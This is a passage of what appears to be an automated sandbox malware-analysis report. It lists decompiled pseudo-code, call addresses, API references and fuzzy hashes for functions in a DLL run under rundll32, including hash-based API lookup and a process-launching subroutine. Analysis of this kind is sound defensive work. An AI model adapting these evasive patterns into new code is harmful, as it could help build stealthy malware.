                  				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
                  				 *_t88();
                  				goto 0x80005f46;
                  				if (r13d == r13d) goto 0x80005f95;
                  				 *(_t122 + 0x60) =  *(_t122 + 0x60) >> 1;
                  				 *((intOrPtr*)(_t88 + _t88 * 2)) = r13w;
                  				r8d =  *(_t122 + 0x60);
                  				HeapAlloc(_t114, _t117);
                  				if (_t88 == _t133) goto 0x80005f8e;
                  				r8d =  *(_t122 + 0x60);
                  				r8d = r8d + 1;
                  				wcstombs(??, ??, ??);
                  				 *(__rcx + 0x20) = _t88;
                  				goto 0x80005f9d;
                  				goto 0x80005f9d;
                  				GetLastError();
                  				HeapFree(??, ??, ??);
                  				goto 0x80005fbc;
                  				goto 0x80005fbc;
                  				return GetLastError();
                  			}











                  0x180005df8
                  0x180005e04
                  0x180005e08
                  0x180005e19
                  0x180005e1f
                  0x180005e23
                  0x180005e2b
                  0x180005e31
                  0x180005e42
                  0x180005e4a
                  0x180005e52
                  0x180005e54
                  0x180005e5c
                  0x180005e6b
                  0x180005e73
                  0x180005e75
                  0x180005e7e
                  0x180005e81
                  0x180005e90
                  0x180005e99
                  0x180005e9b
                  0x180005ea3
                  0x180005ea9
                  0x180005eae
                  0x180005ebc
                  0x180005ec4
                  0x180005ec6
                  0x180005ecb
                  0x180005ece
                  0x180005ed1
                  0x180005edf
                  0x180005ee8
                  0x180005eea
                  0x180005ef8
                  0x180005f04
                  0x180005f13
                  0x180005f1b
                  0x180005f1d
                  0x180005f22
                  0x180005f28
                  0x180005f36
                  0x180005f3f
                  0x180005f41
                  0x180005f49
                  0x180005f56
                  0x180005f5a
                  0x180005f5f
                  0x180005f67
                  0x180005f73
                  0x180005f75
                  0x180005f80
                  0x180005f83
                  0x180005f88
                  0x180005f8c
                  0x180005f93
                  0x180005f95
                  0x180005fa5
                  0x180005fab
                  0x180005fb2
                  0x180005fce

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Alloc$ErrorFreeLastwcstombs
                  • String ID:
                  • API String ID: 4133724704-0
                  • Opcode ID: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
                  • Instruction ID: a4f29d9b70dc603b3f8cc85abbd9ea91cf1cef2a8837b32e5229c32126143bc8
                  • Opcode Fuzzy Hash: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
                  • Instruction Fuzzy Hash: 3F515A36204A8887E7A1DB52E4403AF7761F78C7C9F548521BA8D87B54DF38D65D8B00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 18%
                  			E00000001180003FCC(intOrPtr* __rcx) {
                  				void* __rbx;
                  				void* __rbp;
                  				long long* _t84;
                  				long long* _t85;
                  				void* _t87;
                  				intOrPtr* _t106;
                  				void* _t109;
                  
                  				_t84 =  *0x8000d4a0;
                  				_t106 = __rcx;
                  				 *(_t109 + 0x58) =  *(_t109 + 0x58) & 0;
                  				E0000000118000459C(0x3a7e805d, _t84,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t84 == 0) goto 0x8000400e;
                  				 *_t84();
                  				goto 0x80004010;
                  				if (0 == 0) goto 0x80004151;
                  				if ( *((intOrPtr*)(_t109 + 0x50)) == 0) goto 0x8000414c;
                  				 *0x8000d028();
                  				if (0 != 0) goto 0x80004145;
                  				r8d = 0x1000;
                  				HeapAlloc(??, ??, ??);
                  				if (_t84 == 0) goto 0x80004133;
                  				E0000000118000459C(0x3cd8e449, _t84,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t84 == 0) goto 0x8000408d;
                  				r8d = 0x1000;
                  				r8d =  <  ?  *((void*)(_t109 + 0x50)) : r8d;
                  				 *_t84();
                  				goto 0x8000408f;
                  				if (0 == 0) goto 0x800040b7;
                  				r8d =  *(_t109 + 0x58);
                  				r9d = 0;
                  				_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x60))));
                  				 *((intOrPtr*)(_t85 + 0x20))();
                  				r11d =  *(_t109 + 0x58);
                  				 *((intOrPtr*)(_t109 + 0x50)) =  *((intOrPtr*)(_t109 + 0x50)) - r11d;
                  				if (0 == 0) goto 0x800040bf;
                  				goto 0x80004059;
                  				GetLastError();
                  				if (WaitForSingleObject(??, ??) == 0) goto 0x8000410b;
                  				E0000000118000459C(0x3a7e805d, _t85,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t85 == 0) goto 0x800040ef;
                  				 *_t85();
                  				goto 0x800040f1;
                  				if (0 == 0) goto 0x80004101;
                  				if ( *((intOrPtr*)(_t109 + 0x50)) == 0) goto 0x80004110;
                  				goto 0x80004059;
                  				GetLastError();
                  				goto 0x80004110;
                  				HeapFree(??, ??, ??);
                  				if (0x102 != 0) goto 0x80004138;
                  				E000000011800085E4(_t87, __rcx,  *((intOrPtr*)(_t109 + 0x60)));
                  				goto 0x80004138;
                  				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x60)))) + 0x10))();
                  				goto 0x80004166;
                  				goto 0x80004166;
                  				 *(_t106 + 0x60) =  *(_t106 + 0x60) & 0x00000008;
                  				goto 0x80004166;
                  				if (GetLastError() != 0x2efe) goto 0x80004166;
                  				 *(_t106 + 0x60) =  *(_t106 + 0x60) & 0x00000000;
                  				return 0;
                  			}










                  0x180003fda
                  0x180003fe1
                  0x180003fef
                  0x180003ff7
                  0x180003fff
                  0x18000400a
                  0x18000400c
                  0x180004012
                  0x18000401c
                  0x18000402e
                  0x180004036
                  0x18000403e
                  0x180004047
                  0x180004053
                  0x180004062
                  0x18000406a
                  0x180004070
                  0x180004083
                  0x180004089
                  0x18000408b
                  0x180004091
                  0x180004098
                  0x18000409d
                  0x1800040a0
                  0x1800040a6
                  0x1800040a9
                  0x1800040ae
                  0x1800040b3
                  0x1800040b5
                  0x1800040b7
                  0x1800040cd
                  0x1800040d8
                  0x1800040e0
                  0x1800040eb
                  0x1800040ed
                  0x1800040f3
                  0x1800040fa
                  0x1800040fc
                  0x180004101
                  0x180004109
                  0x180004118
                  0x180004120
                  0x18000412a
                  0x180004131
                  0x180004140
                  0x180004143
                  0x18000414a
                  0x18000414c
                  0x18000414f
                  0x18000415e
                  0x180004160
                  0x180004172

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorLast$Heap$AllocFreeObjectSingleWait
                  • String ID:
                  • API String ID: 2540544816-0
                  • Opcode ID: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
                  • Instruction ID: f07a79ff2e09cda6f9955aa739d580884efaaa7540e40516afedcf37a36379f0
                  • Opcode Fuzzy Hash: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
                  • Instruction Fuzzy Hash: B54143B330464986EB92DB66D8403EA73A1F78CBD1F048425BE498BB95DF78C68DC714
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 45%
                  			E000000011800091F8(void* __ecx, long long __rbx, signed long long __rcx, signed long long __rdx, long long __rsi, void* __rbp, void* __r9, signed long long* _a8, void* _a16, void* _a24) {
                  				void* _t46;
                  				long _t52;
                  				void* _t54;
                  				signed long long _t67;
                  				long long _t69;
                  				signed long long* _t73;
                  				signed long long _t80;
                  				signed long long _t87;
                  				intOrPtr _t90;
                  				struct _FILETIME* _t91;
                  				void* _t98;
                  				void* _t103;
                  				signed long long _t104;
                  				signed long long* _t105;
                  
                  				_t103 = _t98;
                  				 *((long long*)(_t103 + 0x10)) = __rbx;
                  				 *((long long*)(_t103 + 0x18)) = __rsi;
                  				 *(_t103 + 8) =  *(_t103 + 8) & 0x00000000;
                  				 *((long long*)(_t103 - 0x18)) = _t103 + 8;
                  				_t46 =  *((intOrPtr*)(__rcx + 0xa0))();
                  				_t73 = _a8;
                  				if (_t73 == 0) goto 0x8000925e;
                  				_t87 = _t73 + 0x18;
                  				 *(_t73 + 0x20) = _t87;
                  				_a8[3] = _t87;
                  				_a8[2] = __rcx;
                  				_a8[1] = __rdx;
                  				 *_a8 =  *_a8 | 0xffffffff;
                  				if (_t46 != 0) goto 0x80009327;
                  				GetSystemTimeAsFileTime(_t91);
                  				EnterCriticalSection(??);
                  				_t104 = __rcx + 0x88;
                  				_t80 =  *(_t104 + 8);
                  				_a8[3] = _t104;
                  				_a8[4] = _t80;
                  				 *_t80 =  &(_a8[3]);
                  				_t67 =  &(_a8[3]);
                  				 *(_t104 + 8) = _t67;
                  				LeaveCriticalSection(??);
                  				asm("lock add dword [edi+0x40], 0x1");
                  				E00000001180006C8C(__ecx, _t67, __rbx, 0x180004c4c, _a8, __rdx, __rbp,  &(_a8[7]));
                  				_a8[6] = _t67;
                  				if (_a8[6] != 0) goto 0x80009331;
                  				_t52 = GetLastError();
                  				EnterCriticalSection(??);
                  				_t105 = _a8;
                  				_t69 =  *((intOrPtr*)(_t105 + 0x20));
                  				_t90 =  *((intOrPtr*)(_t105 + 0x18));
                  				 *_t69 = _t90;
                  				 *((long long*)(_t90 + 8)) = _t69;
                  				LeaveCriticalSection(??);
                  				asm("lock add dword [edi+0x40], 0xffffffff");
                  				if (_t52 == 0) goto 0x80009331;
                  				if (_a8 == 0) goto 0x80009331;
                  				E00000001180002770(_t54, _a8);
                  				return _t52;
                  			}

















                  0x1800091f8
                  0x1800091fb
                  0x1800091ff
                  0x180009208
                  0x180009214
                  0x18000921b
                  0x180009221
                  0x18000922b
                  0x18000922d
                  0x180009231
                  0x18000923a
                  0x180009243
                  0x18000924c
                  0x180009255
                  0x180009260
                  0x18000926a
                  0x180009274
                  0x18000927f
                  0x180009286
                  0x18000928a
                  0x180009293
                  0x1800092a0
                  0x1800092ac
                  0x1800092b0
                  0x1800092b4
                  0x1800092ba
                  0x1800092cf
                  0x1800092d9
                  0x1800092e7
                  0x1800092f3
                  0x1800092f5
                  0x1800092fb
                  0x180009300
                  0x180009304
                  0x18000930c
                  0x18000930f
                  0x180009313
                  0x180009319
                  0x180009320
                  0x18000932a
                  0x18000932c
                  0x180009342

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeaveTime$ErrorFileLastSystem
                  • String ID:
                  • API String ID: 3478816279-0
                  • Opcode ID: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
                  • Instruction ID: bca48ed322468cd715f0c7fdd995b284444db085db22600a9e38dd0ce7ab83a9
                  • Opcode Fuzzy Hash: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
                  • Instruction Fuzzy Hash: 18415676204F4992DB44CF55E48439D73B4F789B94F608221EBAD837A4DF3ACA6AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A5E
                  • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A72
                  • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AA0
                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AB4
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AC4
                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AD3
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ByteCharErrorHeapLastMultiWide$AllocFree
                  • String ID:
                  • API String ID: 2267670476-0
                  • Opcode ID: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
                  • Instruction ID: 6c13c8b96c3627637da9d419a19c7af847a2c5e8b3803c2844c54b1b1a61164e
                  • Opcode Fuzzy Hash: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
                  • Instruction Fuzzy Hash: 1B21A132304B4886E391DF63B88879A76A5F74CBD0F69C139EE9A93750DF34C9498701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 32%
                  			E00000001180009B7C(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, long long __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
                  				intOrPtr _v40;
                  				long long _v56;
                  				void* _t32;
                  				intOrPtr _t33;
                  				void* _t55;
                  				WCHAR* _t63;
                  				WCHAR* _t66;
                  				CHAR* _t69;
                  
                  				_t32 = _t55;
                  				 *((long long*)(_t32 + 8)) = __rbx;
                  				 *((long long*)(_t32 + 0x10)) = __rbp;
                  				 *((long long*)(_t32 + 0x18)) = __rsi;
                  				 *((long long*)(_t32 + 0x20)) = __rdi;
                  				_t33 =  *0x8000d4a0;
                  				lstrlenA(_t69);
                  				lstrlenW(_t66);
                  				lstrlenW(_t63);
                  				r8d = __rbx + _t33 + 0x12;
                  				HeapAlloc(??, ??, ??);
                  				if (_t33 == 0) goto 0x80009c2e;
                  				_v56 = __r8;
                  				__imp__wnsprintfW();
                  				r9d = 0;
                  				r8d = 0;
                  				E00000001180006754(__rbx, __rcx, _t33, __r8, __rdx,  *0x8000d490 + 0x80011438);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009c32;
                  				return _v40;
                  			}











                  0x180009b7c
                  0x180009b7f
                  0x180009b83
                  0x180009b87
                  0x180009b8b
                  0x180009b99
                  0x180009bb6
                  0x180009bbf
                  0x180009bca
                  0x180009bd9
                  0x180009bdf
                  0x180009beb
                  0x180009c00
                  0x180009c05
                  0x180009c0b
                  0x180009c0e
                  0x180009c17
                  0x180009c26
                  0x180009c2c
                  0x180009c52

                  APIs
                  • lstrlenA.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BB6
                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BBF
                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BCA
                  • HeapAlloc.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BDF
                  • wnsprintfW.SHLWAPI ref: 0000000180009C05
                    • Part of subcall function 0000000180006754: memset.NTDLL ref: 0000000180006786
                    • Part of subcall function 0000000180006754: CreateProcessW.KERNEL32 ref: 00000001800067F7
                    • Part of subcall function 0000000180006754: WaitForMultipleObjects.KERNEL32 ref: 0000000180006824
                    • Part of subcall function 0000000180006754: TerminateProcess.KERNEL32 ref: 0000000180006844
                    • Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000684F
                    • Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000685A
                    • Part of subcall function 0000000180006754: HeapFree.KERNEL32 ref: 0000000180006877
                  • HeapFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009C26
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heaplstrlen$CloseFreeHandleProcess$AllocCreateMultipleObjectsTerminateWaitmemsetwnsprintf
                  • String ID:
                  • API String ID: 3150570956-0
                  • Opcode ID: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
                  • Instruction ID: c1893427c912dd33d9beb41109e2d516a90994c651c2d5da5d8851701b433d67
                  • Opcode Fuzzy Hash: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
                  • Instruction Fuzzy Hash: DD217F35710B48C6EB45CF66A85479A77A0F78CFC4F848126EE5A43B64DF38D60ACB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 30%
                  			E00000001180004DD0(long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long* __r8) {
                  				void* _t13;
                  				intOrPtr* _t39;
                  				intOrPtr _t41;
                  				CHAR* _t54;
                  				long long _t60;
                  				long long _t61;
                  				void* _t63;
                  				long _t69;
                  				long _t73;
                  				long long _t74;
                  				void* _t76;
                  				CHAR* _t79;
                  
                  				 *((long long*)(_t63 + 8)) = __rbx;
                  				 *((long long*)(_t63 + 0x10)) = _t60;
                  				 *((long long*)(_t63 + 0x18)) = __rsi;
                  				_t39 =  *0x8000d4a0;
                  				_t41 =  *((intOrPtr*)(_t39 + 8));
                  				_t13 = lstrlenA(_t79) + 1;
                  				r8d = _t13;
                  				HeapAlloc(_t76, _t73, _t69);
                  				_t74 = _t39;
                  				if (_t39 == __rsi) goto 0x80004eb7;
                  				HeapAlloc(??, ??, ??);
                  				_t61 = _t39;
                  				if (_t39 == __rsi) goto 0x80004ea9;
                  				E00000001180004994(_t39, _t41, __rcx);
                  				if (_t39 == __rsi) goto 0x80004e62;
                  				if ( *_t39 !=  *((intOrPtr*)(_t39 + 1))) goto 0x80004e62;
                  				_t6 = _t39 + 2; // 0x2
                  				E00000001180004994(_t39, _t41, _t6);
                  				if (_t39 == __rsi) goto 0x80004e8e;
                  				r8d = _t13 - r12d;
                  				memcpy(??, ??, ??);
                  				 *((intOrPtr*)(_t41 + _t74)) = sil;
                  				lstrcpyA(_t54);
                  				goto 0x80004e9c;
                  				lstrcpyA(??, ??);
                  				 *_t61 = 0x2f;
                  				 *((intOrPtr*)(_t61 + 1)) = sil;
                  				 *__rdx = _t74;
                  				 *__r8 = _t61;
                  				goto 0x80004eb7;
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}















                  0x180004dd0
                  0x180004dd5
                  0x180004dda
                  0x180004dec
                  0x180004df9
                  0x180004e0d
                  0x180004e0f
                  0x180004e14
                  0x180004e1a
                  0x180004e20
                  0x180004e2e
                  0x180004e34
                  0x180004e3a
                  0x180004e3f
                  0x180004e4a
                  0x180004e51
                  0x180004e53
                  0x180004e5a
                  0x180004e6b
                  0x180004e72
                  0x180004e77
                  0x180004e82
                  0x180004e86
                  0x180004e8c
                  0x180004e8e
                  0x180004e94
                  0x180004e98
                  0x180004e9c
                  0x180004ea4
                  0x180004ea7
                  0x180004eb1
                  0x180004ed5

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Alloclstrcpy$Freelstrlenmemcpystrchr
                  • String ID:
                  • API String ID: 2951650171-0
                  • Opcode ID: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
                  • Instruction ID: 05cbd2bd38c1d1587f62c6617ae6625bb3c46c91ac70328d53f87b1fbcc7e3b3
                  • Opcode Fuzzy Hash: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
                  • Instruction Fuzzy Hash: 9C21BF723047D886E782EF66B80839ABA91B38CFD4F49C420FE498B755DE38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 29%
                  			E000000011800099F4(void* __ecx, long long __rbx, void* __rcx, long long __rdx, void* __rsi, void* __rbp, intOrPtr* __r8, void* __r10, void* __r11, char _a8, long long _a16, long long _a24) {
                  				void* _v48;
                  				char _v56;
                  				char _v64;
                  				char _v72;
                  				intOrPtr _v80;
                  				long long _v88;
                  				void* __rdi;
                  				void* _t73;
                  				long long _t75;
                  				void* _t91;
                  				intOrPtr _t106;
                  				intOrPtr* _t115;
                  
                  				_t92 = __rsi;
                  				_a24 = __rbx;
                  				_a16 = __rdx;
                  				_t106 =  *((intOrPtr*)(__rcx + 0x40));
                  				_t75 = __rdx;
                  				r10d =  *(_t106 + 2) & 0x0000ffff;
                  				_t115 = __r8;
                  				if ( *0x8000d4a0 - __r10 + 8 <= 0) goto 0x80009a51;
                  				_t73 = __r10 + _t106 + 8;
                  				if (( *0x8000d498 ^ 0xecb028fc) == 0) goto 0x80009a53;
                  				E00000001180004ED8( *0x8000d498 ^ 0xecb028fc, _t73);
                  				goto 0x80009a53;
                  				if (_t73 == 0) goto 0x80009b5c;
                  				_t9 =  &_a8; // 0x52
                  				_t10 =  &_v56; // 0x12
                  				if (E000000011800094E0(__rdx, _t73, _t91, __rsi, __rbp, _t10, _t9) != 0) goto 0x80009b61;
                  				_t11 = _t73 + 2; // 0x2
                  				if (_a8 - _t11 <= 0) goto 0x80009aa8;
                  				_t15 =  &_v64; // 0xa
                  				_t16 =  &_v48; // 0x1a
                  				E000000011800081F0(_a8, _t75, _v56, _t92, _t16, _t15, __r11);
                  				goto 0x80009aad;
                  				if (0x57 != 0) goto 0x80009b36;
                  				r13d = _v64;
                  				_t19 =  &_v72; // 0x2
                  				_t20 =  &_v64; // 0xa
                  				_v80 = r13d;
                  				_v72 =  *_t115;
                  				_v88 = _v48;
                  				if (E00000001180006EB0( *_t115, _t75, _t75, _t20, _t19) != 0) goto 0x80009b16;
                  				memcpy(??, ??, ??);
                  				 *_t115 = _v72;
                  				HeapFree(??, ??, ??);
                  				goto 0x80009b1b;
                  				memset(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				r8d = _a8;
                  				memset(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009b61;
                  				return 2;
                  			}















                  0x1800099f4
                  0x1800099f4
                  0x1800099f9
                  0x180009a0b
                  0x180009a16
                  0x180009a19
                  0x180009a36
                  0x180009a3c
                  0x180009a3e
                  0x180009a45
                  0x180009a4a
                  0x180009a4f
                  0x180009a56
                  0x180009a5c
                  0x180009a64
                  0x180009a77
                  0x180009a7d
                  0x180009a87
                  0x180009a95
                  0x180009a9a
                  0x180009a9f
                  0x180009aa6
                  0x180009aaf
                  0x180009ab5
                  0x180009ac2
                  0x180009ac7
                  0x180009acf
                  0x180009ad4
                  0x180009ad8
                  0x180009ae6
                  0x180009afc
                  0x180009b0b
                  0x180009b0e
                  0x180009b14
                  0x180009b23
                  0x180009b30
                  0x180009b36
                  0x180009b45
                  0x180009b54
                  0x180009b5a
                  0x180009b78

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: FreeHeap$memset$memcpy
                  • String ID:
                  • API String ID: 4172471534-0
                  • Opcode ID: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
                  • Instruction ID: 54b9a56baf89d223affce05d04c9eed0c8a26e8b2822132c81dbcb815bbc5161
                  • Opcode Fuzzy Hash: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
                  • Instruction Fuzzy Hash: A9418E32204A8982EA92DB56E4007DBB7A1F7CDBD4F55C012FE8947759EF38C64ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E00000001180008034(void* __ebx, signed int __edx, void* __ebp, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long __r8, intOrPtr* __r9, void* _a8, void* _a16, long long* _a24, void* _a32) {
                  				void* _t44;
                  				void* _t52;
                  				long long _t53;
                  				signed long long _t54;
                  				intOrPtr _t67;
                  				long _t68;
                  				long long _t70;
                  				void* _t77;
                  				intOrPtr* _t83;
                  				long _t87;
                  				void* _t88;
                  				void* _t90;
                  				struct _CRITICAL_SECTION* _t92;
                  				struct _CRITICAL_SECTION* _t96;
                  
                  				_t52 = _t77;
                  				 *((long long*)(_t52 + 8)) = __rbx;
                  				 *((long long*)(_t52 + 0x10)) = __rbp;
                  				 *((long long*)(_t52 + 0x20)) = __rsi;
                  				 *((long long*)(_t52 + 0x18)) = __r8;
                  				_t53 =  *0x8000d4a0;
                  				_t88 = __rcx;
                  				EnterCriticalSection(_t96);
                  				LeaveCriticalSection(_t92);
                  				HeapAlloc(_t90, _t87, _t68);
                  				_t70 = _t53;
                  				if (_t53 == __edx) goto 0x80008129;
                  				memset(??, ??, ??);
                  				EnterCriticalSection(??);
                  				r11d =  *((intOrPtr*)(__rcx + 0xa8));
                  				_t44 =  >=  ? r11d :  *((intOrPtr*)(__rcx + 0xa8));
                  				if (_t44 == 0) goto 0x80008111;
                  				_t54 = __edx + __edx * 4;
                  				_t14 = _t88 + 0x98; // 0x98
                  				_t16 = _t54 * 8; // 0xc
                  				_t83 = _t70 + _t16 + 0xc;
                  				_t67 =  *_t14;
                  				 *((intOrPtr*)(_t83 - 0xc)) =  *((intOrPtr*)(_t67 + 0x1c));
                  				 *((long long*)(_t83 + 0x14)) =  *((intOrPtr*)(_t67 + 0x10));
                  				 *_t83 =  *((intOrPtr*)(_t67 + 0x18));
                  				 *((intOrPtr*)(_t83 + 0x28 - 0x1c)) =  *((intOrPtr*)(_t67 + 0x18));
                  				if (_t44 + 0xffffffff != 0) goto 0x800080e7;
                  				LeaveCriticalSection(??);
                  				 *__r9 = __ebp + 1;
                  				 *_a24 = _t70;
                  				goto 0x8000812e;
                  				return 8;
                  			}

















                  0x180008034
                  0x180008037
                  0x18000803b
                  0x18000803f
                  0x180008043
                  0x180008054
                  0x18000805e
                  0x18000806f
                  0x180008082
                  0x18000809a
                  0x1800080a2
                  0x1800080a8
                  0x1800080b2
                  0x1800080bc
                  0x1800080c2
                  0x1800080cd
                  0x1800080d3
                  0x1800080d5
                  0x1800080da
                  0x1800080e2
                  0x1800080e2
                  0x1800080e7
                  0x1800080ef
                  0x1800080f7
                  0x1800080fe
                  0x18000810b
                  0x18000810f
                  0x180008116
                  0x180008121
                  0x180008124
                  0x180008127
                  0x18000814c

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
